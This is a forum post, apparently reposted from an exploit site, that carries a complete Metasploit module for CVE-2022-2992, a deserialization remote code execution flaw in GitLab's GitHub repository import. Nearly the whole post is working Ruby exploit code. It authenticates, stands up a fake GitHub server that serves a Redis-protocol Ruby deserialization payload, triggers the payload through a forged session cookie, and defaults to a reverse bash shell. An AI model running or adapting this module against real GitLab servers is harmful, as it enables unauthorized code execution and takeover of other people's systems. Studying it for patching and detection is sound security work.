Jump to content
Kev

GitLab GitHub Repo Import Deserialization Remote Code Execution Exploit

Recommended Posts

An authenticated user can import a repository from GitHub into GitLab. If a user attempts to import a repo from an attacker-controlled server, the server will reply with a Redis serialization protocol object in the nested default_branch. GitLab will cache this object and then deserialize it when trying to load a user session, resulting in remote code execution.

 

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  prepend Msf::Exploit::Remote::AutoCheck
 
  include Msf::Exploit::Git::SmartHttp
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Remote::HTTP::Gitlab
  include Msf::Exploit::RubyDeserialization
 
  attr_accessor :cookie
 
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'GitLab GitHub Repo Import Deserialization RCE',
        'Description' => %q{
          An authenticated user can import a repository from GitHub into GitLab.
          If a user attempts to import a repo from an attacker-controlled server,
          the server will reply with a Redis serialization protocol object in the nested
          `default_branch`. GitLab will cache this object and
          then deserialize it when trying to load a user session, resulting in RCE.
        },
        'Author' => [
          'William Bowling (vakzz)', # discovery
          'Heyder Andrade <https://infosec.exchange/@heyder>', # msf module
          'RedWay Security <https://infosec.exchange/@redway>', # PoC
        ],
        'References' => [
          ['URL', 'https://hackerone.com/reports/1679624'],
          ['URL', 'https://github.com/redwaysecurity/CVEs/tree/main/CVE-2022-2992'], # PoC
          ['URL', 'https://gitlab.com/gitlab-org/gitlab/-/issues/371884'],
          ['CVE', '2022-2992']
        ],
        'DisclosureDate' => '2022-10-06',
        'License' => MSF_LICENSE,
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD],
        'Privileged' => false,
        'Stance' => Msf::Exploit::Stance::Aggressive,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_bash'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )
 
    register_options(
      [
        OptString.new('USERNAME', [true, 'The username to authenticate as', nil]),
        OptString.new('PASSWORD', [true, 'The password for the specified username', nil]),
        OptInt.new('IMPORT_DELAY', [true, 'Time to wait from the import task before try to trigger the payload', 5]),
        OptAddress.new('URIHOST', [false, 'Host to use in GitHub import URL'])
      ]
    )
    deregister_options('GIT_URI')
  end
 
  def group_name
    @group_name ||= Rex::Text.rand_text_alpha(8..12)
  end
 
  def api_token
    @api_token ||= gitlab_create_personal_access_token
  end
 
  def session_id
    @session_id ||= Rex::Text.rand_text_hex(32)
  end
 
  def redis_payload(cmd)
    serialized_payload = generate_ruby_deserialization_for_command(cmd, :net_writeadapter)
    gitlab_session_id = "session:gitlab:#{session_id}"
    # A RESP array of 3 elements (https://redis.io/docs/reference/protocol-spec/)
    # The command set
    # The gitlab session to load the payload from
    # The Payload itself. A Ruby serialized command
    "*3\r\n$3\r\nset\r\n$#{gitlab_session_id.size}\r\n#{gitlab_session_id}\r\n$#{serialized_payload.size}\r\n#{serialized_payload}"
  end
 
  def check
    self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie
 
    vprint_status('Trying to get the GitLab version')
 
    version = Rex::Version.new(gitlab_version)
 
    return CheckCode::Safe("Detected GitLab version #{version} which is not vulnerable") unless (
      version.between?(Rex::Version.new('11.10'), Rex::Version.new('15.1.6')) ||
      version.between?(Rex::Version.new('15.2'), Rex::Version.new('15.2.4')) ||
      version.between?(Rex::Version.new('15.3'), Rex::Version.new('15.3.2'))
    )
 
    report_vuln(
      host: rhost,
      name: name,
      refs: references,
      info: [version]
    )
    return CheckCode::Appears("Detected GitLab version #{version} which is vulnerable.")
  rescue Msf::Exploit::Remote::HTTP::Gitlab::Error::AuthenticationError
    return CheckCode::Detected('Could not detect the version because authentication failed.')
  rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e
    return CheckCode::Unknown("#{e.class} - #{e.message}")
  end
 
  def cleanup
    super
    return unless @import_id
 
    gitlab_delete_group(@group_id, api_token)
    gitlab_revoke_personal_access_token(api_token)
    gitlab_sign_out
  rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e
    print_error("#{e.class} - #{e.message}")
  end
 
  def exploit
    if Rex::Socket.is_internal?(srvhost_addr)
      print_warning("#{srvhost_addr} is an internal address and will not work unless the target GitLab instance is using a non-default configuration.")
    end
 
    setup_repo_structure
    start_service({
      'Uri' => {
        'Proc' => proc do |cli, req|
          on_request_uri(cli, req)
        end,
        'Path' => '/'
      }
    })
    execute_command(payload.encoded)
  rescue Timeout::Error => e
    fail_with(Failure::TimeoutExpired, e.message)
  end
 
  def execute_command(cmd, _opts = {})
    vprint_status("Executing command: #{cmd}")
    # due to the AutoCheck mixin and the keep_cookies option, the cookie might be already set
    self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie
    vprint_status("Session ID: #{session_id}")
    vprint_status("Creating group #{group_name}")
    # We need group id for the cleanup method
    @group_id = gitlab_create_group(group_name, api_token)['id']
    fail_with(Failure::UnexpectedReply, 'Failed to create a new group') unless @group_id
    @redis_payload = redis_payload(cmd)
    # import a repository from GitHub
    vprint_status('Importing a repository from GitHub')
    @import_id = gitlab_import_github_repo(
      group_name: group_name,
      github_hostname: get_uri,
      api_token: api_token
    )['id']
 
    fail_with(Failure::UnexpectedReply, 'Failed to import a repository from GitHub') unless @import_id
    # wait for the import tasks to finish
    select(nil, nil, nil, datastore['IMPORT_DELAY'])
    # execute the payload
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, group_name),
      'method' => 'GET',
      'keep_cookies' => false,
      'cookie' => "_gitlab_session=#{session_id}"
    })
  rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e
    fail_with(Failure::Unknown, "#{e.class} - #{e.message}")
  end
 
  def setup_repo_structure
    blob_object_fname = "#{Rex::Text.rand_text_alpha(5..10)}.txt"
    blob_data = Rex::Text.rand_text_alpha(5..12)
    blob_object = Msf::Exploit::Git::GitObject.build_blob_object(blob_data)
 
    tree_data =
      {
        mode: '100644',
        file_name: blob_object_fname,
        sha1: blob_object.sha1
      }
    tree_object = Msf::Exploit::Git::GitObject.build_tree_object(tree_data)
 
    commit_obj = Msf::Exploit::Git::GitObject.build_commit_object(tree_sha1: tree_object.sha1)
 
    git_objs = [ commit_obj, tree_object, blob_object ]
 
    @refs =
      {
        'HEAD' => 'refs/heads/main',
        'refs/heads/main' => commit_obj.sha1
      }
    @packfile = Msf::Exploit::Git::Packfile.new('2', git_objs)
  end
 
  # Handle incoming requests from GitLab server
  def on_request_uri(cli, req)
    super
    headers = { 'Content-Type' => 'application/json' }
    data = {}.to_json
    case req.uri
    when %r{/api/v3/rate_limit}
      headers.merge!({
        'X-RateLimit-Limit' => '100000',
        'X-RateLimit-Remaining' => '100000'
      })
    when %r{/api/v3/repositories/(\w{1,20})}
      id = Regexp.last_match(1)
      name = Rex::Text.rand_text_alpha(8..12)
      data = {
        id: id,
        name: name,
        full_name: "#{name}/name",
        clone_url: "#{get_uri.gsub(%r{/+$}, '')}/#{name}/public.git"
      }.to_json
    when %r{/\w+/public.git/info/refs}
      data = build_pkt_line_advertise(@refs)
      headers.merge!({ 'Content-Type' => 'application/x-git-upload-pack-advertisement' })
    when %r{/\w+/public.git/git-upload-pack}
      data = build_pkt_line_sideband(@packfile)
      headers.merge!({ 'Content-Type' => 'application/x-git-upload-pack-result' })
    when %r{/api/v3/repos/\w+/\w+}
      bytes_size = rand(3..8)
      data = {
        'default_branch' => {
          'to_s' => {
            'bytesize' => bytes_size,
            'to_s' => "+#{Rex::Text.rand_text_alpha_lower(bytes_size)}\r\n#{@redis_payload}"
            # using a simple string format for RESP
          }
        }
      }.to_json
    end
    send_response(cli, data, headers)
  end
end
 
#  0day.today [2023-02-16]  #

 

Source: 0day.today

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...